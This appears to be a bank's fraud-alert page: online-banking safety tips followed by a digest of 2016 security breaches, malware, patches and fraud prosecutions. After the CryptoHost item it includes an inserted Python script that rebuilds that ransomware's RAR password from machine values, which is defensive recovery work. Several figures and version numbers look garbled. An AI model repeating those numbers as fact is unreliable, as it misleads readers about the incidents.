Fraud Alert Message Center
Tips for Safe Banking Over the Internet
As use of the Internet continues to expand, more banks are using the Web to offer products and services or otherwise enhance communications with customers.
The Internet offers the potential for safe, convenient new ways to shop for financial services and conduct banking business, any day, any time. However, safe banking online involves making good choices - decisions that will help you avoid costly surprises or even scams.
- Consumer Best Practices for Online Banking
- Business Best Practices for Online Banking
- Recommendations for Online Fraud Victims
- Recommendations for Mobile Phone Security
Current Online Threats
Please be aware of any email you receive claiming to be from the following organizations: FDIC, FFIEC, NACHA, EPCOR, the Federal Reserve and the Better Business Bureau. None of these organizations should ever send you unsolicited emails regarding your bank or your bank accounts. If you receive an email purporting to be from any of the above organizations, or any other email you are unsure about, do not open it. The email could potentially contain a virus or malware.
For more information regarding email and phishing scams, please visit: http://onguardonline.gov/
Online Shopping Tips for Consumers.
ATM and gas pump skimming information.
Target Card Breach - A breach of credit and debit card data at discount retailer Target may have affected as many as 70 million shoppers. The Secret Service, which is charged with safeguarding the nation's financial infrastructure and payment systems, confirmed it was investigating the breach. Please be assured we are aware of the breach. As we receive additional information from Visa, we will notify any client whose card has potentially been compromised. Customers should monitor their account activity online if they have used their card at Target and report any fraudulent activity to the bank.
Bloods-linked gang members charged with running $414G identity-theft ring. Officials from the New York County District Attorney’s Office announced April 26 that 39 gang members were charged for their roles in a $414,000 identity theft scheme in which the group used stolen bank information from the Dark Web to create phony credit cards, used them to make fraudulent purchases at Barneys and Saks Fifth Avenue stores, and sold the goods to fund personal expenses. Officials stated that a subsequent search of the suspects’ apartments in Queens and Brooklyn, New York, revealed computers and credit card making equipment, among other illicit materials.
Critical, high severity flaws patched in Firefox. Mozilla released Firefox 46, which patched a total of 14 vulnerabilities, including 4 critical vulnerabilities affecting the browser engine that could cause crashes and potentially allow arbitrary code execution, as well as a high-severity vulnerability that could be exploited via specially crafted Web content to cause an exploitable crash, among other flaws.
Time for a patch: Six vulns fixed in NTP daemon. Security researchers from Cisco’s Talos Security Intelligence and Research Group discovered five vulnerabilities in the Network Time Protocol daemon (ntpd) during their ongoing ntpd evaluation, which revealed that attackers could craft User Datagram Protocol (UDP) packets to cause a denial-of-service (DoS) condition or prevent the correct time from being set, among other actions. The vulnerabilities were patched in Network Time Protocol (NTP) version 4.2.8p7.
Cisco finds backdoor installed on 12 million PCs. Cisco’s Talos Security Intelligence and Research Group reported that Tuto4PC’s OneSoftPerDay application was discovered to install potentially unwanted programs (PUPs), harvest users’ personal information, and act as a backdoor on 12 million personal computers (PCs), after an analysis revealed an increase in generic trojans when about 7,00 unique samples displayed names including “Wizz” in some of the domains.
Over 7M Minecraft mobile credentials exposed after Lifeboat data breach. Lifeboat Networks reported April 27 that its network was compromised in January, exposing the login names, passwords, and email addresses of its users of the Minecraft Pocket Edition mobile game, after a security researcher found over 7 million user credentials available online. Lifeboat discreetly forced its customers to reset their passwords and stated that it had started using stronger algorithms to guard user data.
Waze drivers can be tracked, network flooded with fake traffic. Six researchers from the University of California, Santa Barbara, and Tsinghua University discovered that they could create fake traffic jams and track the movements of any Waze user by reverse engineering the Waze app’s communications protocol and mounting Sybil attacks to insert thousands of malicious users into the Waze network. The attacks could manipulate the app’s behavior and allow attackers to pose as Waze users when communicating with the app’s Google server.
Attackers increasingly abuse open source security tools. Security researchers from Kaspersky Lab reported that the open source security tool, Browser Exploitation Framework (BeEF) was being leveraged by an advanced persistent threat (APT) group named NewsBeef to track and steal users’ browsing history from compromised Web sites through flaws in content management systems. In addition, researchers reported that other APT actors were using open source tools in their operations to execute malware across the globe.
Verizon 2016 DBIR: What you need to know. Verizon released its 2016 Data Breach Investigations Report (DBIR), which revealed current information technology (IT) trends and the overall cyberattack landscape after an analysis of over 100,000 security incidents. The report confirmed 2,260 data breaches across 82 different countries in 2015, with the majority of breaches attributed to human nature, exploited via phishing campaigns.
Feds break up money-laundering scheme linked to fraudulent Armenian passports. The U.S. District Court in Santa Ana unsealed charges the week of April 18 against 7 California residents for their roles in a $14 million identity theft and international money laundering scheme where the group filed approximately 7,000 fraudulent tax returns by using stolen identities to create fraudulent foreign passports from the Republic of Armenia, Georgia, and the Czech Republic in order to open numerous bank accounts and mailboxes, which were used to deposit and launder the refunds. Officials stated that a total of 10 people were involved in the fraud scheme that sought a total of $38 million in fraudulent tax returns.
DDoS aggression and the evolution of IoT risks. Neustar released the findings of a survey of over 1,000 information technology (IT) professionals across 6 continents, which revealed that 76 percent of companies are investing in distributed denial-of-service (DDoS) protection as DDoS attacks continue to evolve from single large attacks to multi-vector attacks. Forty-seven percent of attacked organizations were participating in information sharing on threats and countermeasures to mitigate future assaults.
Information stealer “Fareit” abuses PowerShell. Security researchers from Trend Micro discovered that a new variant of the Fareit malware was stealing login details, Bitcoin-related data, and other personal information from victims. The malware was delivered via spam emails and executed through two different tactics: Word documents with malicious macros, and PDF documents that invoke Windows PowerShell. Attackers could use PDF files to execute PowerShell via the OpenAction event, which allows Fareit to download onto a victim’s machine and collect information.
The Pirate Bay malvertising campaign pushes Cerber ransomware. Security researchers from Malwarebytes and RiskIQ reported that malicious ads on The Pirate Bay torrent portal were redirecting victims using older Windows and Internet Explorer software to another Uniform Resource Locator (URL), where the Magnitude exploit kit (EK) would leverage a Flash zero-day flaw to compromise vulnerable personal computers (PCs), install the Cerber ransomware, and install potentially unwanted programs (PUPs).
Miami woman had 371 counterfeit credit cards in luggage, police say. A Miami woman was arrested April 23 at Miami International Airport after authorities noticed suspicious masses in her luggage during a security checkpoint screening, prompting a secondary hand inspection of her suitcase which revealed 371 counterfeit credit cards. A subsequent search revealed two additional fraudulent credit cards in the woman’s wallet.
Facebook bug allowed attackers to take over accounts on other sites. Facebook patched a flaw in its account registration process after security researchers from Bitdefender discovered the flaw could allow attackers to take over users’ profiles on Web sites where the Facebook Social Login feature was available by adding an attacker’s email address as a secondary address, enabling the attacker to verify the profile and make modifications to the account information.
Malicious insiders could tap ransomware-as-a-service for profit. Security researchers from Imperva revealed that the ransomware-as-a-service (RaaS) model could be leveraged by malicious insiders to exploit an organization’s unstructured data, locate sensitive data, and encrypt the company’s most valuable information, after discovering that authors and distributors of the malware use anonymous Bitcoin addresses and the Tor network to ensure they receive their ransom money and stay undetected by law enforcement agencies.
Compromised credentials still to blame for many data breaches. A Cloud Security Alliance survey found that a lack of scalable identity and access management systems, a lack of ongoing automated rotation of cryptographic keys, passwords, and certificates, and failure to use multifactor authentication were the major causes of data breaches. The findings also indicated that 22 percent of companies that suffered a data breach attributed the breach to compromised credentials.
Critical flaws in HP Data Protector open servers to remote attacks. Hewlett Packard released security updates for its HP Data Protector software patching six critical vulnerabilities in all versions prior to 7.03_108, 8.15, and 9.06, which could allow remote code execution or unauthorized disclosure of information to unauthenticated users, or, through an embedded Secure Sockets Layer (SSL) private key, increase the chance of man-in-the-middle (MitM) attacks.
Attacker friendly hosting firm leveraged by Pawn Storm hackers. Security researchers from Trend Micro reported that the Pawn Storm group was abusing a small Virtual Private Server (VPS) provider registered in the United Arab Emirates (UAE) to attack governments in 80 countries including Bulgaria, Greece, Malaysia, Ukraine, and the U.S., and was seen executing more than 100 cyber-attacks within the past year. In addition, it was discovered that the group used the VPS hosting provider for command and control (C&C) servers, exploit sites, spear-phishing campaigns, domestic espionage in Russia, and Web mail phishing sites targeting high-profile users.
Adobe patches flaw in analytics AppMeasurement for Flash Library. Adobe released its Analytics AppMeasurement for Flash library version 4.0.1, which patched a Document Object Model (DOM)-based cross-site scripting (XSS) vulnerability after a security researcher discovered the vulnerability when the debugTracking feature was enabled. The flaw affects version 4.0 and earlier.
Law enforcement, government agencies see phishing as main cyber risk. The Global Cyber Alliance (GCA), a group of government representatives from the U.S. and the United Kingdom, agreed to promote the usage of Domain-based Message Authentication, Reporting & Conformance (DMARC) protocol to make it more difficult for attackers to tamper with original documents as phishing attacks were ranked as the top cyber threat following research that revealed spear-phishing campaigns increased by 55 percent from 2015.
DDoS attacks continue to rise in power and sophistication. Imperva released its Global DDoS Threat Landscape Q1 2016 report, which revealed that distributed denial-of-service (DDoS) attacks were becoming more advanced and sophisticated after an analysis showed that attackers increased the use of browser-like DDoS bots capable of bypassing security challenges by 36.6 percent, and were seen executing new kinds of application layer assaults including Hypertext Transfer Protocol Secure (HTTPS) POST floods.
Man arrested in Tenn. accused of skimming 1,800 credit cards. Officials reported April 20 that a man was arrested and charged with criminal simulation April 7 after police found thousands of items of merchandise in the suspect’s vehicle, along with the stolen identities of 150 people, during a traffic stop. Investigators reported that the man stole the credit card data of 1,800 people across several States by secretly installing skimming devices on gas pumps.
“FIN6” cybergang steals millions of cards from PoS systems. FireEye reported that the cybercriminal group dubbed “FIN6,” which has been targeting thousands of retail and hospitality Point-of-Sale (PoS) systems, was increasing its revenue by stealing millions of credit card records and selling the information on an underground market, and possessed valid credentials for each targeted company’s network. Researchers were unsure how the attackers initially compromised each system due to the lack of forensic evidence.
Cisco patches severe flaws in Wireless LAN controller. Cisco released software updates for its Wireless LAN Controller (WLC) products which patch several critical flaws and high severity denial-of-service (DoS) vulnerabilities, including an issue in the Hypertext Transfer Protocol (HTTP) Uniform Resource Locator (URL) redirection feature of the WLC software that could allow an unauthenticated attacker to remotely trigger a buffer overflow and cause affected devices to enter a DoS condition.
New tool aims to generically detect Mac OS X ransomware. A security researcher from Synack developed a tool named “RansomWhere?” that will detect and block all types of file-encrypting ransomware on Apple Mac OS X systems by constantly monitoring the file system for the creation of encrypted files by suspicious processes. The tool was developed after researchers received several reports of ransomware targeting Mac OS X users within the past year.
3 wanted in Gaston Co. skimming case. Gastonia Police reported April 19 that they were searching for 3 suspects believed to be involved in 21 fraud cases after the trio installed skimming devices at Gaston County gas stations and stole customers’ debit card information and personal identification numbers (PINs).
SEC announces financial fraud cases. The U.S. Securities and Exchange Commission (SEC) reported April 19 that Logitech International agreed to pay over $7.5 million in Federal penalties for allegations that the company inflated its 2011 financial records to meet its earning guidance during a 5-year period and that 4 of its executives violated Logitech’s warranty accrual accounting, minimized the write-downs of millions of dollars of excess component parts, and failed to remunerate an earlier acquisition. The SEC also stated that 3 former executives at Ener1, Inc., agreed to pay a total of $180,000 in penalties after the trio overstated revenues and assets in 2010 and overstated assets in the first quarter of 2011.
New PWOBot Python malware can log keystrokes, mine for bitcoin. Security researchers from Palo Alto Networks discovered a new malware family dubbed PWOBot, written in Python, whose modules can execute other binaries, launch a Hypertext Transfer Protocol (HTTP) server, log keystrokes, execute custom Python code, query remote Uniform Resource Locators (URLs), and mine for bitcoins using the victim’s central processing unit (CPU) or graphics processing unit (GPU).
Oracle patches 138 bugs, 9 in Java, 31 in MySQL. Oracle released patches addressing 136 security issues, of which 9 were considered critical flaws, in 49 different product suites including Oracle Database, Java, MySQL, Solaris, Berkeley Database, and VirtualBox, among other products. Users were advised to update their software to the latest versions.
Security firm discovers secret plan to hack numerous websites and forums. Security researchers from SurfWatch Labs reported that they prevented a new trojan named Thanatos from potentially infecting thousands of Invision Power Services (IPS) servers after researchers scanned the Dark Web and discovered that attackers were planning to exploit a vulnerability in the IPS infrastructure by accessing the Web sites of IPS’ customers and adding an exploit kit to each page. IPS was informed of the attackers’ scheme and shut down all of its access points.
Kaspersky announces antivirus for Industrial Control Systems (ICS). Kaspersky launched a new cyber-security tool, named Industrial CyberSecurity, which will help Industrial Control Systems/Supervisory Control And Data Acquisition (ICS/SCADA) equipment become more resilient against cyberattacks and will prevent attackers from damaging railway systems, nuclear power plants, oil and gas companies, and various other SCADA equipment by including an “observability mode” which will alert operators of cyberattacks, personnel faults, and anomalies inside an industrial network, among other features.
Pro-ISIS group defaces 88 websites in three-day rampage. A hacking group called Team System Dz reportedly hacked and defaced 88 Web sites from France, Israel, the U.K., and the U.S. between April 14 and April 16, leaving pro-Islamic State messages on each compromised Web page, many of which were running WordPress.
Google analyzes effectiveness of website hack notifications. Google and the University of California, Berkeley released a study revealing that nearly 60 percent of hijacking incidents were resolved by Webmasters over an 11-month period, with about 22 percent of Search Quality Web sites and 6 percent of Safe Browsing Web sites reinfected within 1 month. Google advised Webmasters to sign up for Google’s Search Console to ensure they are notified when their Web sites become compromised.
New CryptXXX ransomware locks your files, steals bitcoin and local passwords. Security researchers from Proofpoint discovered that the CryptXXX ransomware has an infostealer component that can harvest information and credentials from a user’s local instant messenger clients, email clients, FTP clients, and Internet browsers, as well as steal bitcoins. The researchers found that CryptXXX is similar to the older Reveton ransomware and was allegedly created by the authors of the Angler exploit kit (EK).
Ransomware uses blockchains to transmit decryption keys. Researchers from Sucuri discovered that ransomware developers were using blockchains to deliver decryption keys to victims infected with ransomware, after finding that using blockchains to transmit decryption keys is much more reliable for attackers than using payment gates and compromised third-party Web sites: the entire transaction process is public and transparent while the attackers’ real Internet Protocol (IP) addresses stay hidden.
Valencia man pleads guilty to fraud in $20 million precious metal investment scam. The U.S. Attorney’s Office charged the owner of Superior Gold Group, LLC., and Superior Equity Group, LLC., for 4 counts of wire fraud, 5 counts of wire fraud, and 2 counts of money laundering as a part of a $20 million metal investment scam April 15 after the man defrauded more than 300 investors by failing to disclose material information to investors pertaining to the delivery of precious metals and cost investors to lose nearly $11 million while the man used the investors’ money for personal expenditures from October 2007 – December 2010.
SEC charges litigation marketing company with bilking retirees. The U.S. Securities and Exchange Commission charged Los Angeles-based Prometheus Law and its two co-founders with conducting a Ponzi-like scheme April 15 after the duo raised $11.7 million from about 250 investors and retirees, promising investors that the funds would be allocated for marketing and advertising to locate plaintiffs for class-action lawsuits, but instead diverted about $5.6 million for their personal use while failing to deliver the promised 100 to 300 percent returns to investors.
3.2 million devices exposed to ransomware attacks: Cisco. Security researchers from Cisco Talos discovered that approximately 3.2 million computers were vulnerable to file-encrypting ransomware due to out-of-date software after an Internet scan of already compromised devices revealed that more than 2,100 backdoors across 1,600 Internet Protocol (IP) addresses were associated with governments, schools, aviation companies, and other organizations. Cisco advised administrators to disable external access to infected machines to keep attackers out.
C99 webshell increasingly used in WordPress attacks. IBM Security reported a 45 percent increase in attacks on WordPress Web sites using a variant of the PHP webshell dubbed C99, after IBM identified nearly 1,000 such attacks in February and March.
Flaws found in Accuenergy, Ecava ICS products. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released advisories detailing several flaws in ICS products from Accuenergy Corporation, Ecava, and Sierra Wireless Company, including an authentication bypass issue in Acuvim II and Acuvim IIR products, a security issue in Accuenergy devices, and an information disclosure vulnerability in Sierra Wireless’ ACEmanager product, among other vulnerabilities.
New USB-C standard can help fight USB malware. The USB Implementers Forum (USB-IF) reported that it created a new standard, USB Type-C Authentication, that will help protect USB-C capable devices from low-end USB chargers that may damage a user’s device and will help prevent USB malware from infecting a device, as USB-C Authentication only sends data to a device that adheres to the strict USB-C specifications.
Decrypter available for AutoLocky, Locky ransomware copycat. A security researcher from Emsisoft developed a decrypter for a new ransomware named AutoLocky, a variant of the Locky ransomware, which can encrypt a victim’s files by tricking the victim into accessing a malicious link created inside the Start Menu StartUp folder named “Start.Ink.” The decrypter was developed after researchers found a flaw in the ransomware.
VMware patches critical vulnerability. VMware released updates for several of its products, including a patch for a critical vulnerability in its Client Integration Plugin (CIP) that could have allowed an attacker to execute a man-in-the-middle (MitM) or session hijacking attack by tricking a vSphere Web Client user into visiting a specially crafted Web site. VMware advised its customers to update all affected programs to patch the flaw.
Western Digital user data exposed by DNS issue. A security researcher discovered that a Western Digital (WD) nameserver supporting the company’s My Cloud NAS products was not configured properly and exposed a Domain Name System (DNS) flaw that could have been exploited by an attacker to conduct a zone transfer and obtain the zone file, which could contain user data valuable to attackers seeking to exploit a zero-day vulnerability in the products. WD corrected the faulty configuration after scanning all of its servers and reviewing the architecture and processes in place for modifying nameserver configuration.
SEC case freezes assets of ski resort steeped in fraudulent EB-5 offerings. The U.S. Securities and Exchange Commission charged two owners of Jay Peak Inc., and its eight business partners for conducting a Ponzi-like fraud scheme April 14 after the group misused more than $350,000 million, which was raised through investments and solicited under the EB-5 Immigrant Investor Program by using the funds for personal expenses and other-than-stated purposes while omitting key information and making false statements to investors in an effort to construct ski resort facilities and a biomedical research facility in Vermont.
9 charged in alleged San Jose car insurance fraud ring. The Santa Clara County District Attorney’s Office reported April 13 that a San Jose body shop manager, his girlfriend, and seven other body shop owners were charged with insurance fraud after the group allegedly made more than $140,000 by filing false insurance claims for over 20 fabricated vehicle accidents listed under counterfeit names from 2011 – 2015. The group purchased the insurance policies days before each incident and purposely damaged each car to file claims with several insurance companies.
Hybrid trojan “GozNym” targets North American banks. Researchers from IBM Security discovered a hybrid trojan, dubbed “GozNym,” that was reported to combine the Nymaim dropper and the Gozi financial malware: it leverages the Nymaim dropper’s stealth and persistence while adding trojan capabilities from Gozi’s ISFB components to facilitate fraud via infected Internet browsers. The trojan is believed to have stolen millions of dollars from victims, targeting 22 financial institutions in the U.S. and Canada including banks, credit unions, e-commerce platforms, and retail banking.
No patches for QuickTime Flaws as Apple ends support on Windows. ZDI reported that Apple will no longer release security updates for Windows versions of QuickTime after a security researcher from Source Incite found a heap corruption vulnerability that could allow an attacker to achieve remote code execution (RCE) once a victim accesses a maliciously crafted Web site or file. Apple released instructions on removing QuickTime for Windows users and advised users to remove legacy plugins to enhance their personal computer (PC) security.
Google, Microsoft address problems in their URL shorteners. An independent security researcher and a professor at Cornell Tech discovered that Uniform Resource Locator (URL) shortening services used by Google and Microsoft employ short random character tokens that can allow an attacker to reach potentially private files holding sensitive information using brute-force attacks. The researchers found the flaw after beginning a series of automated scans on Microsoft’s 1drv.com and finding it exceptionally easy to brute-force its small 6-character URLs.
Clever techniques help malware evade AV engines. Security researchers from FireEye released a study titled Ghost in the Endpoint, which revealed that various malware components went undetected by antivirus programs for an extended period of time, including a backdoor dubbed “GOODTIMES” that was left undetected because it was disguised as an Excel file (XLSX) while leveraging a Flash Player exploit.
Lizard Squad downs Blizzard servers with massive DDoS attacks. A Blizzard spokesman reported that its European and U.S. servers that host games such as World of Warcraft, Diablo 3, and Starcraft 2 experienced connectivity and latency issues for several hours April 14 following a suspected distributed denial-of-service (DDoS) attack allegedly conducted by the Lizard Squad hacking group. Blizzard technical support was working to mitigate the impact of the attacks.
Microsoft issues optional Windows update to fix MouseJack vulnerability. Microsoft released its monthly security updates addressing several vulnerabilities, including a flaw dubbed MouseJack, after security researchers from Bastille found that an attacker could spoof data from a wireless device and force the Universal Serial Bus (USB) dongle to send fraudulent instructions to the connected personal computer (PC) and execute malicious actions.
Adobe patches flaws in Creative Cloud, RoboHelp. Adobe released Creative Cloud version 184.108.40.206, which patched an important vulnerability in the sync process that affected Creative Cloud Libraries version 220.127.116.11 and earlier versions, as well as a security hotfix for RoboHelp Server version 9, which patched a critical vulnerability linked to the Structured Query Language (SQL) queries that could lead to information disclosure, among other patched vulnerabilities.
Another IBM Java patch bypassed by researchers. Researchers from Security Explorations discovered that IBM’s patch for Java’s “issue 70” was ineffective and could be easily bypassed and exploited for a complete sandbox escape against Java versions 7 and 8, because the patches did not address the root causes of the vulnerabilities or introduce security checks into the code. Security Explorations published a report describing how IBM’s patch can be bypassed and released Proof-of-Concept (PoC) code for the flaw.
Links found between different ransomware families. Researchers from AlienVault released a report addressing several similarities between PowerWare and PoshCoder ransomware including the use of the RijndaelManaged class and that both ransomware encrypt the same file types, which suggests that the two threats are connected. In addition, the report stated several similarities between Rokku and Chimera ransomware including the use of the ReflectiveLoader function, which is used in both ransomware for reflective dynamic link library (DLL) injection to load a library from memory into a host process.
Over half a billion personal records were stolen or lost in 2015. Symantec Corporation released a report which stated that in 2015 many companies avoided disclosing the full details of their data breaches, after researchers found that over 429 million records were lost or stolen and that data breaches grew by 85 percent compared to 2014. In addition, the report stated that 75 percent of popular Web sites had major vulnerabilities, of which 15 percent were considered critical.
Improved Qbot worm targets public institutions. Researchers from BAE Systems discovered that an improved version of the Qbot malware was targeting public organizations such as police departments, hospitals, and universities, after finding that the malware’s developers had made several improvements to avoid detection and that more than 54,000 machines internationally were part of the botnet, with 85 percent of infections located in the U.S. Researchers noted that attackers distributed the Qbot malware via compromised Web sites that led to the RIG exploit kit (EK).
Goldman Sachs agrees to pay more than $5 billion in connection with its sale of residential mortgage backed securities. The U.S. Department of Justice announced April 11 that Goldman Sachs Group, Inc., agreed to pay a total of $5.06 billion to settle charges related to the firm’s conduct in the packaging, securitization, marketing, sale, and issuance of residential mortgage-backed securities from 2005-2007 after the firm falsely assured prospective investors that the securities it sold were backed by sound mortgages, thereby causing billions of dollars in losses to financial institutions. As part of the settlement, Goldman Sachs must pay a civil penalty, provide monetary relief to homeowners and distressed borrowers, and pay a fine to settle claims with other Federal and State entities, among other requirements.
Wells Fargo admits deception in $1.2 billion U.S. mortgage accord. The U.S. Department of Justice announced April 8 that it reached a $1.2 billion settlement with Wells Fargo & Company and resolved claims with a former vice president after the bank admitted to falsely certifying that many of its home loans qualified for Federal Housing Administration insurance from 2001-2008, and to failing to file timely reports on several thousand loans with material defects from 2002-2010. The agreement also resolved claims by Federal prosecutors in California that Wells Fargo-owned American Mortgage Network, LLC allegedly issued false loan certifications.
Ramdo Click-Fraud malware continues to evolve. Security researchers from Dell SecureWorks and Palo Alto Networks released an analysis of the Ramdo click-fraud malware, also known as Redyms, which stated that Ramdo silently generates clicks on online ads from infected systems and is also capable of downloading and installing additional malicious software on those systems. The report stated that while the malware was not very sophisticated, its operators were actively working on new features and on methods to avoid detection and hinder analysis.
WordPress.com pushes free HTTPS to all hosted sites. WordPress.com reported that it now serves all custom domains it hosts, including blogs and Web sites, over Hypertext Transfer Protocol Secure (HTTPS) at no charge, ensuring visitors are served only encrypted HTTPS traffic.
Malware found in IoT cameras sold by Amazon. The co-founder of Proctorio discovered that a set of security cameras sold through Amazon.com, Inc., shipped with malware: when a camera was connected to a personal computer, an iframe, brenz_pl/rc/, loaded a malicious Web site, which could potentially give attackers remote access to and remote control of the camera and other components in a target’s home.
“ID Ransomware” website helps identify ransomware infections. An independent security researcher launched a new Web site named ID Ransomware that helps victims identify which ransomware variant has locked their computers or files: users upload the ransom note or an encrypted file to the Web site, which analyzes it and reports the variant. Once the ransomware type is identified, users receive a link to download a decrypter, if one is available, to unlock their files without paying the ransom.
Jigsaw ransomware threatens to delete your files, free decrypter available. Security researchers from @MalwareHunterTeam discovered a new ransomware dubbed Jigsaw that was infecting computers through an as-yet unknown infection method and pressuring victims into paying the ransom by targeting 226 different file types, encrypting each file with the Advanced Encryption Standard (AES) algorithm, and appending the .fun extension to each file name. Researchers advised victims to download the JigSawDecrypter to decrypt locked files.
Google improves safe browsing for Network Admins. Google reported that it made improvements to its Safe Browsing Alerts for Network Administrators service that will inform administrators about Uniform Resource Locators (URLs) on their networks related to malicious software, potentially unwanted programs (PUPs), and social engineering, as well as about compromised pages on their networks that could harm users via drive-by downloads or exploits.
Petya ransomware unlocked, you can now recover password needed for decryption. Two security researchers discovered ways to help victims of the Petya ransomware retrieve locked files and unlock computers after one researcher created two Web sites where victims can obtain the decryption password, and another researcher from Emsisoft created a tool that can help generate passwords needed to unlock victims’ computers.
Nuclear exploit kit uses Tor to download payload. Researchers from Cisco discovered that the Nuclear exploit kit (EK) was dropping a Tor client for Microsoft Windows, named “tor.exe”, and using it to fetch a secondary payload over the Tor anonymity network; several domains seen in the EK’s network traffic were never registered and generated no Domain Name System (DNS) traffic, consistent with the requests being routed through Tor rather than resolved on the public Internet. Researchers noted that because the second payload was downloaded through Tor, the malware was harder to trace back to its hosting system.
CryptoHost ransomware locks your data in a password-protected RAR file. Security researchers from MalwareForMe, MalwareHunterTeam, Bleeping Computer, and an independent researcher found a way to recover files locked by the CryptoHost ransomware after analysis revealed that it derives a secure hash algorithm 1 (SHA-1) hash from the user’s ID number, the motherboard serial number, and the C:\ volume serial number, and uses that hash as both the RAR archive’s name and its password. Researchers stated victims need to open the Windows Task Manager, find the cryptohost.exe process, end it, and then extract the RAR file with the recovered password.
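Key material derived only from values already present on the victim’s machine, as described above, can be reconstructed without the attacker. The following is an added example, not the researchers’ tool: it rebuilds a CryptoHost-style password from the three machine values and, because the report does not say how they are joined, tries every ordering and a few separators until one reproduces the archive name. The component values, separator list and helper names are constructed for the example.

```python
import hashlib
from itertools import permutations

# Constructed stand-ins for the three values CryptoHost reportedly hashes.
# On a real machine they would be read from the infected host (the user ID,
# `wmic baseboard get serialnumber`, and `vol C:`), not typed in.
COMPONENTS = {
    "user_id": "1234567890",
    "board_serial": "MB-1B2C3D4E",
    "volume_serial": "A1B2-C3D4",
}

# The report does not say how the three values are joined, so every
# ordering and each of these separators is tried (assumption).
SEPARATORS = ("", "-", "_", " ")


def derive(material: str) -> str:
    """SHA-1 hex digest of the joined values, which CryptoHost uses as name and password."""
    return hashlib.sha1(material.encode("utf-8")).hexdigest()


def candidates(components: dict, separators=SEPARATORS):
    """Yield (ordering, separator, sha1hex) for every way of joining the values."""
    for order in permutations(components):
        for sep in separators:
            material = sep.join(components[name] for name in order)
            yield order, sep, derive(material)


def recover_password(components: dict, rar_filename: str):
    """Match the archive's name (the SHA-1 hex) against every candidate derivation.

    Returns a dict describing the matching derivation, or None if no
    combination reproduces the observed name.
    """
    name = rar_filename.lower()
    if name.endswith(".rar"):
        name = name[:-4]
    for order, sep, digest in candidates(components):
        if digest == name:
            return {"password": digest, "order": order, "separator": sep}
    return None


if __name__ == "__main__":
    # Demo only: build an archive name the way the ransomware would, then recover it.
    observed = derive("".join(COMPONENTS.values())) + ".rar"
    print(recover_password(COMPONENTS, observed))
```

The recovered digest is typed in as the RAR password after the cryptohost.exe process has been ended; if no candidate matches, the separator list or the source of one of the three values is wrong, not the approach.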
Cisco releases critical security updates. Cisco released six security advisories, including one for a high impact vulnerability in the Web application programming interface (API) of Cisco Prime Infrastructure and Evolved Programmable Network Manager (EPNM) that could allow an attacker to send a crafted Uniform Resource Locator (URL) request to bypass role-based access control (RBAC) and gain elevated privileges, as well as one for a vulnerability in the TelePresence Server that could allow an attacker to cause a kernel panic and reboot the device, among other vulnerabilities.
Vacaville police seize 170 fake credit cards in ID theft bust. A San Francisco resident was arrested April 4 after police found 170 fraudulent cards under 7 different names, $600 in cash, and several drivers’ licenses in the suspect’s possession when he was apprehended for making more than $2,000 in fraudulent purchases at the Vacaville Premium Outlets. An investigation into the extent of the fraudulent activity is ongoing.
Florida man suspected of $200k in fraudulent purchases across U.S. arrested in Missoula. A Florida resident suspected of using counterfeit credit cards to make $200,000 worth of fraudulent purchases at stores in over 20 States was arrested in Missoula, Montana, April 4 after a loss prevention officer at the Sportsman’s Warehouse alerted police that the suspect was in the store. A search of the suspect reportedly revealed 13 credit cards and the investigation is ongoing.
22 face charges in Miami drug money-laundering ring involving ‘El Chapo’ cartel. Miami-Dade authorities announced arrest warrants April 7 for 22 people who are suspected of laundering around $1 million in illegal drug profits each month through nearly a dozen Miami businesses prior to sending the money to Colombia. The arrests are part of “Operation Neymar,” a 2-year investigation run by DHS, Miami police, and Florida State prosecutors that probes into the black market peso exchange and monitors deals in 17 countries.
Miami couple charged with $2 million identity theft fraud, authorities say. The Manhattan District Attorney’s office announced April 5 charges against a Miami couple for allegedly running a $2 million credit card fraud and identity theft scheme where the duo and co-conspirators stole personal information from over 40 victims to open credit cards, which they had shipped to locations all over the U.S. Authorities found dozens of credit cards under different names, forged identification and licenses, and a credit card encoder, among other illicit materials at multiple Miami addresses associated with the couple.
Ubuntu patches several kernel vulnerabilities. Ubuntu released patches addressing several vulnerabilities in the Linux kernel and various Ubuntu 14 and 15 variants including a use-after-free flaw that can be exploited by a local attacker to crash a system and potentially execute arbitrary code, a timing side channel vulnerability that can be exploited by an attacker to disrupt the integrity of the system, and a denial-of-service (DoS) vulnerability that could allow an unauthenticated attacker to exhaust resources and force a DoS condition, among other flaws.
Adobe patches flash zero-day exploited by Magnitude EK. Adobe released an update for its Flash Player products that patched a zero-day vulnerability, specifically a memory corruption flaw that can be exploited for remote code execution, after a security researcher from Proofpoint found changes in the Magnitude exploit kit (EK); and upon further investigation, discovered attackers were delivering various threats such as Cerber and Locky ransomware via the Magnitude EK.
Authorities shut down botnet of 4,000 Linux servers used to send spam. ESET reported that a joint effort with CyS Centrum LLC and the Cyber Police of Ukraine helped shut down the six-year-old Mumblehard botnet after researchers pinpointed the location of the true command and control (C&C) server when Mumblehard’s operators began making changes to their malware’s code. Authorities seized the Internet Protocol (IP) address of the server and transferred it to a security firm, which now runs a sinkhole server at that address that drops all requests from Mumblehard’s bots.
Police: 3 people arrested for credit card scam, over 250 counterfeit credit/debit cards found. Two California men and a New Jersey woman were arrested and charged April 4 in Nashua, New Hampshire, after authorities found over 250 counterfeit credit and debit cards, more than 20 gift cards, and receipts originating from North Carolina in the trio’s vehicle. A subsequent search of the group’s two hotel rooms in Tewksbury, Massachusetts, revealed a laptop computer, a card reader and coder, a box of blank cards, and a large quantity of gift cards.
Google reCAPTCHA cracked in new automated attack. Three security researchers developed a new automated attack that uses machine learning to bypass the image-based challenges of Google’s reCAPTCHA and Facebook’s CAPTCHA systems, solving the image challenges with a 70.78 percent success rate in a study of 2,235 CAPTCHAs. The attack achieved a higher degree of accuracy than previously reported and could potentially be replicated by malicious hackers.
OSVDB shut down permanently. Leaders of the Open Sourced Vulnerability Database (OSVDB) reported that its database will be shut down permanently due to the lack of support and contribution from the Information Technology (IT) industry. The project’s blog will remain active to help provide commentary on items related to the vulnerability world.
Police raids target cyber-criminals in four countries: Germany. Approximately 700 international police officers participated in coordinated multi-national raids in the Netherlands, France, Canada, and Germany to arrest globally active hackers and a variety of Internet criminals that offered illicit services such as disguising malware from anti-virus programs to steal online passwords and banking information, among other actions. Officials reported that they arrested a chief suspect and confiscated about 300 computers and disks.
